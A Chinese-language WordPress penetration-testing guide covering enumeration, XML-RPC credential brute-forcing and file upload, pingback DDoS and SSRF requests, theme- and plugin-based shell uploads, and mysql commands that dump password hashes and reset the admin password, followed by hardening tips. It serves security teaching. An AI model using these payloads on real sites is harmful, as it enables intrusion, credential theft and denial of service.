使用Trickest可以轻松构建和自动化工作流程，使用世界上最先进的社区工具。 立即获取访问权限：

基本信息

上传的文件位于：http://10.10.10.10/wp-content/uploads/2018/08/a.txt 主题文件位于/wp-content/themes/，因此如果更改主题的某些php以获得RCE，则可能会使用该路径。例如：使用twentytwelve主题，您可以在以下位置访问404.php文件：/wp-content/themes/twentytwelve/404.php 另一个有用的URL可能是： /wp-content/themes/default/404.php

在wp-config.php中，您可以找到数据库的根密码。

要检查的默认登录路径：/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/

主要WordPress文件

• index.php

• license.txt 包含有用的信息，如安装的WordPress版本。

• wp-activate.php 用于设置新WordPress站点时的电子邮件激活过程。

• 登录文件夹（可能已重命名以隐藏）：

  • /wp-admin/login.php

  • /wp-admin/wp-login.php

  • /login.php

  • /wp-login.php

• xmlrpc.php 是WordPress的一个功能文件，它使数据能够通过HTTP作为传输机制和XML作为编码机制进行传输。这种通信方式已被WordPress REST API取代。

• wp-content文件夹是存储插件和主题的主目录。

• wp-content/uploads/ 是存储上传到平台的任何文件的目录。

• wp-includes/ 这是存储核心文件的目录，如证书、字体、JavaScript文件和小部件。

• wp-sitemap.xml 在WordPress版本5.5及更高版本中，WordPress会生成一个包含所有公共帖子和可公开查询的帖子类型和分类法的站点地图XML文件。

后渗透

• wp-config.php文件包含WordPress连接到数据库所需的信息，如数据库名称、数据库主机、用户名和密码、身份验证密钥和盐以及数据库表前缀。此配置文件还可用于激活DEBUG模式，这在故障排除中很有用。

用户权限

• 管理员

• 编辑者：发布和管理自己和其他人的帖子

• 作者：发布和管理自己的帖子

• 贡献者：编写和管理自己的帖子，但不能发布它们

• 订阅者：浏览帖子并编辑其个人资料

被动枚举

获取WordPress版本

检查是否可以找到文件/license.txt或/readme.html

在页面的源代码中（例如来自https://wordpress.org/support/article/pages/的示例）：

• grep

curl https://victim.com/ | grep 'content="WordPress'

• meta name

• CSS link files

• JavaScript files

获取插件

curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

获取主题

curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

提取一般版本

curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

使用 Trickest 可以轻松构建并由全球最先进的社区工具驱动的自动化工作流程。 立即获取访问权限：

主动枚举

插件和主题

您可能无法找到所有可能的插件和主题。为了发现它们所有，您需要主动暴力破解插件和主题列表（幸运的是，有自动化工具包含这些列表）。

用户

ID 暴力破解

通过暴力破解用户ID，您可以从WordPress网站获取有效用户：

curl -s -I -X GET http://blog.example.com/?author=1

如果响应为200或30X，表示id是有效的。如果响应为400，则id是无效的。

wp-json

您还可以尝试通过查询获取有关用户的信息：

curl http://blog.example.com/wp-json/wp/v2/users

另一个可以揭示有关用户信息的 /wp-json/ 端点是：

curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL

注意，此端点仅公开已发布帖子的用户。仅提供启用此功能的用户的信息。

还要注意**/wp-json/wp/v2/pages**可能会泄漏IP地址。

登录用户名枚举

在**/wp-login.php登录时，消息会根据指定的用户名是否存在而不同**。

XML-RPC

如果xml-rpc.php处于活动状态，则可以执行凭据暴力破解，或者使用它来发动对其他资源的DoS攻击（例如，您可以使用此工具来自动化此过程）。

要查看它是否处于活动状态，请尝试访问_/xmlrpc.php_并发送此请求：

检查

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

凭证暴力破解

wp.getUserBlogs、**wp.getCategories或metaWeblog.getUsersBlogs**是一些可用于暴力破解凭证的方法。如果你找到任何一个，你可以发送类似以下内容：

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

在一个200状态码的响应中，如果凭据无效，应该出现消息_"用户名或密码不正确"_。

使用正确的凭据，您可以上传一个文件。在响应中将显示路径(https://gist.github.com/georgestephanis/5681982)

<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

也有一种更快的方法可以使用**system.multicall**来暴力破解凭据，因为您可以在同一请求中尝试多个凭据：

绕过双因素认证

这种方法适用于程序而非人类，并且比较老旧，因此不支持双因素认证。因此，如果您拥有有效凭据但主入口受到双因素认证保护，您可能能够滥用 xmlrpc.php 以绕过双因素认证登录。请注意，您将无法执行通过控制台可以执行的所有操作，但您仍然可能能够像 Ippsec 在 https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s 中解释的那样实现 RCE。

DDoS 或端口扫描

如果您可以在列表中找到 pingback.ping 方法，您可以让 WordPress 向任何主机/端口发送任意请求。 这可用于要求数千个 WordPress 站点访问一个位置（从而在该位置引发DDoS），或者您可以使用它来让WordPress扫描一些内部网络（您可以指定任何端口）。

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

如果您得到的faultCode值大于0（17），这意味着端口是开放的。

查看前一节中对**system.multicall**的使用，了解如何滥用此方法来发动 DDoS 攻击。

DDoS

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>

wp-cron.php DoS

这个文件通常存在于Wordpress站点的根目录下：/wp-cron.php 当访问这个文件时，会执行一个“繁重”的MySQL 查询，因此可以被攻击者用来引发DoS。 此外，默认情况下，wp-cron.php会在每次页面加载时被调用（每当客户端请求任何Wordpress页面时），这在高流量站点上可能会引起问题（DoS）。

建议禁用Wp-Cron，并在主机内创建一个真正的cronjob，以在规律的时间间隔内执行所需的操作（而不会引起问题）。

/wp-json/oembed/1.0/proxy - SSRF

尝试访问 https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net，Wordpress站点可能会向您发出请求。

当它不起作用时的响应：

SSRF

这个工具检查methodName: pingback.ping和路径**/wp-json/oembed/1.0/proxy**，如果存在，它会尝试利用它们。

Automatic Tools

cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"

使用 Trickest 可轻松构建并通过全球最先进的社区工具自动化工作流程。 立即获取访问权限：

通过覆盖一个位获取访问权限

这不仅仅是一个真正的攻击，而是一种好奇。在 CTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man 中，您可以翻转任何 WordPress 文件的 1 位。因此，您可以翻转文件 /var/www/html/wp-includes/user.php 的位置 5389，以将 NOT (!) 操作变为 NOP。

if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(

面板RCE

修改主题中使用的php文件（需要管理员凭据）

外观 → 主题编辑器 → 404模板（在右侧）

更改内容为php shell：

搜索互联网，找出如何访问更新后的页面。在这种情况下，您必须访问这里：http://10.11.1.234/wp-content/themes/twentytwelve/404.php

MSF

您可以使用：

use exploit/unix/webapp/wp_admin_shell_upload

插件RCE

PHP插件

可能可以将.php文件上传为插件。 例如，使用以下方式创建您的php后门：

然后添加一个新插件：

上传插件并点击立即安装：

点击“继续”：

可能看起来不会有任何变化，但如果您转到媒体，您将看到您上传的shell：

访问它，您将看到执行反向shell的URL：

上传和激活恶意插件

此方法涉及安装已知易受攻击且可被利用以获取Web shell的恶意插件。此过程通过WordPress仪表板执行如下：

1. 获取插件：从Exploit DB等来源获取插件，例如此处。

2. 安装插件：

• 转到WordPress仪表板，然后转到仪表板 > 插件 > 上传插件。

• 上传下载的插件的zip文件。

3. 激活插件：一旦插件成功安装，必须通过仪表板激活。

4. 利用：

• 安装并激活插件“reflex-gallery”后，可以利用其已知易受攻击的漏洞。

• Metasploit框架提供了此漏洞的利用。通过加载适当的模块并执行特定命令，可以建立一个meterpreter会话，从而未经授权地访问站点。

• 值得注意的是，这只是利用WordPress站点的众多方法之一。

内容包括描绘在WordPress仪表板中安装和激活插件步骤的视觉辅助。然而，重要的是要注意，未经授权地利用漏洞是非法和不道德的。这些信息应该负责任地使用，只能在合法的情况下使用，例如在明确获得许可的渗透测试中。

有关更详细的步骤，请查看： https://www.hackingarticles.in/wordpress-reverse-shell/**

后期利用

提取用户名和密码：

mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"

更改管理员密码：

mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"

WordPress保护

定期更新

确保WordPress、插件和主题是最新的。还要确认在wp-config.php中启用了自动更新：

define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );

此外，只安装可信赖的WordPress插件和主题。

安全插件

• Wordfence Security

• Sucuri Security

• iThemes Security

其他建议

• 删除默认的 admin 用户

• 使用 强密码 和 双因素认证

• 定期审查用户的 权限

• 限制登录尝试 以防止暴力破解攻击

• 重命名 wp-admin.php 文件，并仅允许内部访问或特定IP地址访问。

使用 Trickest 可轻松构建和 自动化工作流程，由全球 最先进 的社区工具提供支持。 立即获取访问权限：